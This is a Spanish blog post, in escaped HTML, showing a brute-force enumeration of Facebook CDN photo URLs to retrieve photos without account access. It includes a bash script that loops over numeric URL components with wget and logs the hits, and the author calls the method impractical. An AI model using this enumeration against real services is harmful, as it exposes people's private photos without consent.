donde el n\u00famero marcado en rojo corresponde a mi profile id, el cual obviamente es constante, al contrario de todos los dem\u00e1s n\u00fameros \u00a0que son variables y\u00a0representan\u00a0el resultado de alg\u00fan<\/span> algoritmo de ordenamiento o algo as\u00ed. Para los que no lo recuerden o sepan (este blog intenta ser lo m\u00e1s friendly posible) un algoritmo de fuerza bruta, implica ni m\u00e1s ni menos que ir probando todas las combinaciones posibles.<\/p>\n Analizemos esto, tenemos 37 d\u00edgitos que varian, siendo los mismos decimales cada d\u00edgito tiene 10 combinaciones posibles lo que nos da un 10\u00b3\u2077 combinaciones aproximadamente. Es m\u00e1s que evidente que es un n\u00famero bastante grande. Computacionalmente es un n\u00famero m\u00e1s que accesible que tardara su tiempo dependiendo del poder de c\u00e1lculo de nuestra computadora, el problema radica en que por cada iteraci\u00f3n haremos un pedido al servidor y eso tiene su delay. Multipliquemos este delay por 10\u00b3\u2077 y m\u00e1s o menos tenemos desde Mois\u00e9s hasta la actualidad.<\/p>\n Podriamos realizar un ataque a m\u00e1s de un servidor y\/o desde m\u00e1s de una pc atacante, pero en definitiva el tiempo necesario para perpetrar dicho ataque seguir\u00eda siendo bastante.<\/p>\n Resumiendo, este ataque no tiene practicidad alguna, m\u00e1s que demostrar que hipot\u00e9ticamente es posible y para resaltar ciertas curiosidades que tiene esta red social.<\/p>\n Antes de realizar un script para perpetrar el ataque de fuerza bruta, indagu\u00e9 un poco los links de mis propias fotos, esperando encontrar algun orden l\u00f3gico el cual me permita acotar la cantidad de variables y me encontr\u00e9 con una curiosidad. Los links de mis fotos viejas (09-10) poseian otro formato<\/p>\n En base a la observaci\u00f3n el \/51\/16 parecer\u00eda constante as\u00ed como el \/v254 ten\u00eda cierta persistencia, pero\u00a0poni\u00e9ndonos\u00a0estrictos\u00a0podr\u00edamos\u00a0decir que tenemos 26 d\u00edgitos que\u00a0var\u00edan, bajamos 11 variables! Sin embargo sigue siendo un n\u00famero bastante alto.<\/p>\n Por lo que para el script en cuesti\u00f3n tom\u00e9 ciertas consideraciones al “atacar” a un\u00a0\u00e1lbum\u00a0espec\u00edfico<\/p>\n while [ $MIN1 -lt $MAX1 ];do Para resumir,\u00a0plant\u00e9 la hip\u00f3tesis de que es posible ejecutar un ataque de fuerza bruta contra los servidores de im\u00e1genes de facebook.\u00a0Usando un caso modelo acotado, demostr\u00e9 que es posible aunque extremadamente impr\u00e1ctico.<\/p>\n Como aprendizaje o curiosidad me queda, que las im\u00e1genes\u00a0est\u00e1n\u00a0alojadas ‘p\u00fablicamente’, que las url de las mismas muestran el id de su due\u00f1o y una de las cosas m\u00e1s interesantes es que el servidor permite realizar el ataque.<\/p>\n Me resulta curioso como uno es capaz de realizar un gran n\u00famero de pedidos a direcciones inv\u00e1lidas sin que el servidor detecte un comportamiento sospechoso o si lo hace, no\u00a0act\u00fae.<\/p>\n <\/p>\n","protected":false},"excerpt":{"rendered":" En el post anterior ya mencion\u00e9 algunas curiosidades respecto a las url’s de facebook y que informaci\u00f3n pod\u00edamos sacar de ellas; sin embargo sent\u00ed que quedaba algo pendiente y es mostrar como es hipot\u00e9ticamente posible robar fotos de una cuenta a la que no tenemos acceso, mediante la fuerza bruta. \u00bfPor qu\u00e9 “hipot\u00e9ticamente”? En el … <\/p>\nEl Ataque<\/strong><\/h3>\n
https:\/\/fbcdn-sphotos-a.akamaihd.net\/photos-ak-ash1\/v254\/51\/16\/639435781\/n639435781_450402_9982.jpg<\/pre>\n
\n
\n#!\/bin\/bash
\nLOC=\/home\/alejandro\/Escritorio\/Facebook
\nOUTPUT="$LOC\/file.txt"
\nBASE="http:\/\/fbcdn-sphotos-a.akamaihd.net\/photos-ak-ash1\/"
\nLINK=""
\nID=639435781
\nCONST1=254
\nCONST2=51
\nCONST3=16
\nMIN1=450403
\nMAX1=450412
\nMIN2=702
\nMAX2=3970<\/p>\n
\n MIN2=702
\n while [ $MIN2 -lt $MAX2 ];do
\n\t LINK=$BASE"v"$CONST1"\/"$CONST2"\/"$CONST3"\/"$ID"\/n"$ID"_"$MIN1"_"$MIN2".jpg"
\n \t echo $LINK
\n\t TEST=$(wget $LINK -o – -q)
\n\t if [ "$TEST" != "" ]; then
\n\t echo $LINK >> $OUTPUT
\n\t fi
\nlet MIN2=$MIN2+1
\n done
\n let MIN1=$MIN1+1
\ndone
\n[\/sourcecode]<\/p>\n<\/div>\n![\"\"](\"https:\/\/fbcdn-sphotos-a.akamaihd.net\/photos-ak-ash1\/v254\/51\/16\/639435781\/n639435781_450403_702.jpg\")
<\/a>![\"\"](\"https:\/\/fbcdn-sphotos-a.akamaihd.net\/photos-ak-ash1\/v254\/51\/16\/639435781\/n639435781_450404_951.jpg\")
<\/a>![\"\"](\"https:\/\/fbcdn-sphotos-a.akamaihd.net\/photos-ak-ash1\/v254\/51\/16\/639435781\/n639435781_450405_1208.jpg\")
\n<\/a>Se puede apreciar que las fotos siguen el orden l\u00f3gico del script<\/em><\/div>\nColorario<\/strong><\/h3>\n
NOTA: Al t\u00e9rmino de esta entrada el script arroj\u00f3 otro resultado, \nsiendo al momento 4 im\u00e1genes en 2 horas 20 min aproximadamente.<\/pre>\n
<\/a>
\nCuriosidades de Facebook Reloaded por Alejandro Pernin<\/a> se encuentra bajo una Licencia Creative Commons Atribuci\u00f3n 3.0 Unported<\/a>.<\/p>\n